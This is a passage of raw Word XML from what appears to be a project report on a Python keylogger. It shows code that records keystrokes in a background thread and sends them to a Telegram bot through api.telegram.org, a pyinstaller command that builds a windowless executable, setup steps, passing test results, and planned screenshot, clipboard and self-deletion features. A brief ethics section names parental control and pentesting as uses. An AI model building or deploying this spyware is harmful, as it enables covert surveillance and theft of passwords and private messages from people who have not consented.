      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>logs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8C3020" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">  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"r") as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1F3CE1" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_data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C6F43E1" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238BD4CC" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">        requests.post(f"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>https://api.telegram.org/bot{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>BOT_TOKEN}/sendMessage",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F6994" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">                      data</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chat_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": CHAT_ID, "text": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3239F1" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">       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"w").close()  # Clear log file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E5B0F7" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="56C2A21C" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t># Keylogging function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D1F6B9" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C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28F2D5EC" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">  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"a") as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070599DA" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C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(str(key) + "\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEBEEDF" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="0237E770" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># Run listener in background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B66212" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>listener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DD10BA" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">    with Listener(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>) as listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD7854A" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>listener.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062139EF" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="43B83554" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t># Run keylogger as a background thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE2B781" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"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start_listener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, daemon=True).start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A67720" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="3D34E75C" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="319C7B15" w14:textId="0730E403" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">6.4 Converting Script to Executable  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2A931E" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">Convert the script into an .exe file for deployment:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5AD279" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36492700" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pyinstaller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onefile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>noconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> keylogger.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6A09EF" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="120BF4FC" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="6FC2353F" w14:textId="729E7788" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="08819997" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="6EEDF850" w14:textId="64541535" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">7. Execution Steps  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5C19B0" w14:textId="0D7098F2" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">1. Create a Telegram bot using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BotFather</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A523BE4" w14:textId="5520AD28" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">2. Replace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>your_bot_token_here</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>your_chat_id_here</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in the script.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD09A8E" w14:textId="76749177" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">3. Run the script using:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C615D3" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">   bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A400A22" w14:textId="70FD838E" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00487B15">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>python keylogger.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D182F5" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6199CB37" w14:textId="2822DD34" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">4. Test the keylogger by typing into any application.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6415F17E" w14:textId="24721D27" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">5. Check your Telegram bot for captured logs.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE59EC" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="452C82D5" w14:textId="7CF70692" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="1A08609A" w14:textId="77777777" w:rsidR="00487B15" w:rsidRDefault="00487B15" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="09586689" w14:textId="77777777" w:rsidR="00487B15" w:rsidRDefault="00487B15" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="184D6B50" w14:textId="77777777" w:rsidR="00487B15" w:rsidRDefault="00487B15" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="4A82AD81" w14:textId="50817E12" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">8. Error Handling and Solutions  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1247181D" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="4C74D9BD" w14:textId="3FFEE15C" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r w:rsidR="00050297">
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r w:rsidR="00050297">
        <w:t xml:space="preserve">                                  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
      <w:r w:rsidR="00050297">
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Solution </w:t>
      </w:r>
      <w:r w:rsidR="00050297">
        <w:t xml:space="preserve">                                              </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">|  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D21342" w14:textId="45078E3F" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>|-----------</w:t>
      </w:r>
      <w:r w:rsidR="002B43BD">
        <w:t>--------------------------------</w:t>
      </w:r>
      <w:r>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="002B43BD">
        <w:t>----------------------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">------------|  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B399E85" w14:textId="42E00AD7" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ModuleNotFoundError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B43BD">
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Install missing module with pip install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> |  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C834275" w14:textId="4BA879E7" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">| Invalid Bot Token </w:t>
      </w:r>
      <w:r w:rsidR="002B43BD">
        <w:t xml:space="preserve">                          </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Verify the token in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BotFather</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00050297">
        <w:t xml:space="preserve">                                          </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">|  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52998328" w14:textId="36199BBE" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FileNotFoundError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B43BD">
        <w:t xml:space="preserve">                       </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Ensure log file path exists </w:t>
      </w:r>
      <w:r w:rsidR="00050297">
        <w:t xml:space="preserve">                                                </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">|  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66496AB9" w14:textId="52C0A7C0" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>| Telegram message not received | Check internet connection and bot permissions</w:t>
      </w:r>
      <w:r w:rsidR="00050297">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29902934" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="1A897C3F" w14:textId="35F079DA" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="277033E3" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="16834B62" w14:textId="2138ECC5" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">9. Security and Ethical Considerations  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EF9FC1" w14:textId="6AE0EA1C" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">This project must be used ethically for:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D08EF3" w14:textId="08123BCD" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Parental control (monitoring child's online activity).  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008BFF8" w14:textId="3EF47437" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Personal security (monitoring personal devices).  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB94FB5" w14:textId="0496B2B3" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Penetration testing (ethical hacking to find vulnerabilities).  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02339897" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="1071976C" w14:textId="77E4F03B" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">Misuse of keyloggers for unauthorized monitoring is illegal and punishable under cyber laws.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CAD769" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="30B6CB6F" w14:textId="59421FE6" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="6FA73790" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="7D0B9222" w14:textId="08843114" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">10. Testing and Results  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF22840" w14:textId="35ABEA70" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r w:rsidR="00D43D62">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>Test Case</w:t>
      </w:r>
      <w:r w:rsidR="00D43D62">
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidR="00D43D62">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Expected Outcome </w:t>
      </w:r>
      <w:r w:rsidR="00D43D62">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Result |  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FEE981" w14:textId="3E4E00AD" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>|-------------</w:t>
      </w:r>
      <w:r w:rsidR="00D43D62">
        <w:t>----------------</w:t>
      </w:r>
      <w:r>
        <w:t>-|-----------</w:t>
      </w:r>
      <w:r w:rsidR="00D43D62">
        <w:t>---------------------</w:t>
      </w:r>
      <w:r>
        <w:t>-----|---------</w:t>
      </w:r>
      <w:r w:rsidR="004C4796">
        <w:t>----</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">|  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1950D3EE" w14:textId="1413CCD5" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">| Capture keystrokes </w:t>
      </w:r>
      <w:r w:rsidR="00D43D62">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Logs recorded in keylog.txt | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pass |  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDF11AD" w14:textId="517CD020" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">| Send logs to Telegram | Logs received on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">Telegram </w:t>
      </w:r>
      <w:r w:rsidR="004C4796">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>|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Pass |  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B5E6E0" w14:textId="63749B48" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">| Convert to .exe </w:t>
      </w:r>
      <w:r w:rsidR="00D43D62">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:t>| Successfully runs as .exe</w:t>
      </w:r>
      <w:r w:rsidR="00D43D62">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C4796">
        <w:t xml:space="preserve">  </w:t>
      </w:r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Pass |  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7166EEB9" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="14E116C3" w14:textId="4D2FA7CC" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="1A32EB84" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="178908C4" w14:textId="77777777" w:rsidR="00170433" w:rsidRDefault="00170433" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="2E81F508" w14:textId="67C6DCCA" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">11. Limitations  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA1F1B9" w14:textId="2D4336C5" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- No GUI – Runs in the background.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C31A6D" w14:textId="58E862D8" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Only keystrokes captured – No screenshots or clipboard logging.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D9A7BA" w14:textId="47DE9F1A" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- May be flagged by antivirus software.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D048C7F" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="128EBCC8" w14:textId="0FF30A88" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="08ECF391" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="0548A9EB" w14:textId="7C3C178A" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">12. Future Enhancements  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB3E3D" w14:textId="71558CEB" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Clipboard Monitoring – Capture copied text.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777F87E4" w14:textId="7358062F" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Screenshot Capturing – Take screenshots at intervals.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D3EF2" w14:textId="1DFD3DA1" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Encryption – Encrypt log files for security.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB4B357" w14:textId="6C65CE50" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Self-Destruction – Delete logs after sending.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250D9F6" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="32C6858A" w14:textId="7A8C1DF2" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="04FDCA71" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="174BF339" w14:textId="33842B2A" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">13. Conclusion  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BE7E97" w14:textId="24CF3B19" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">This project demonstrates an advanced Python-based keylogger with Telegram integration. It allows real-time keystroke logging, secure remote monitoring, and background execution. However, its use must be ethical and legal.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420B3920" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="439B6B66" w14:textId="3CF9A6C9" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="3C73FBAD" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="488AEA99" w14:textId="0FF4C09A" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">14. References </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1456C5C1" w14:textId="55C473F2" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">1. Python Official Documentation – </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00170433" w:rsidRPr="0035182D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.python.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00170433">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
